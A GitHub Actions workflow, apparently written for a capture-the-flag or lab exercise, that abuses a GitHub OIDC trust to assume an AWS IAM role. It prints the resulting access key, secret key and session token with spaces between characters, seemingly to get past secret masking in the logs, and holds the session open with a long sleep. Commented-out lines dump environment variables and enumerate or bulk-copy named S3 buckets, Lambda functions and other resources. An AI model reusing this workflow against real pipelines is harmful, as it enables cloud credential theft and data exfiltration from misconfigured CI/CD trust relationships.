name: be-evil
run-name: ${{ github.actor }} is being super evil
on: [push]
permissions:
  id-token: write
jobs:
  infiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: Infiltrate Corgi Muahahah
        uses: aws-actions/configure-aws-credentials@main
        with:
          role-to-assume: arn:aws:iam::373958419501:role/cicdRole
          aws-region: us-east-1
      - name: Additional Steps...
        run: |
          echo "$AWS_ACCESS_KEY_ID" | sed 's/./& /g' > output.txt
          echo "$AWS_SESSION_TOKEN" | sed 's/./& /g' | fold -w 80
          echo "$AWS_SESSION_TOKEN" | sed 's/./& /g' | fold -w 80 >> output.txt 
          echo "$AWS_SECRET_ACCESS_KEY" | sed 's/./& /g' >> output.txt
          cat output.txt
          sleep 500000
#          aws s3api get-bucket-policy --bucket platform-bucket-373958419501-us-east-1 --debug 
# echo hello
# aws s3api get-bucket-policy --bucket site89d6e1f0ac68fa77
# echo hello
# aws s3api get-bucket-policy --bucket code9bab03acc99894ec
# echo hello
# aws s3 sync s3://platform-bucket-373958419501-us-east-1 localdir
# echo hello
# aws s3 sync s3://site89d6e1f0ac68fa77 localdir
# echo hello
# aws s3 sync s3://code9bab03acc99894ec localdir
#          env >> secret.json
#          set >> secret.json
#          cat secret.json
#          echo ${env.AWS_SECRET_ACCESS_KEY} >> secret.json
#          aws s3 ls s3://code9bab03acc99894ec --recursive

 #         echo hello
  #        aws s3 ls s3://platform-bucket-373958419501-us-east-1 --recursive
   #       aws s3 cp s3://platform-bucket-373958419501-us-east-1 --recursive
    #      echo hello
     #     aws s3 ls s3://site89d6e1f0ac68fa77 --recursive
      #    aws s3 cp s3://site89d6e1f0ac68fa77 --recursive
       #   echo hello
#          aws sts get-session-token
#          aws lambda list-functions
#          aws lambda get-function --function-name nslookupv2
#          aws lambda get-policy --function-name nslookupv2
#          aws lambda get-function-configuration --function-name nslookupv2
#          aws ec2 describe-instances
#          aws cloudfront list-distributions
#          aws s3 ls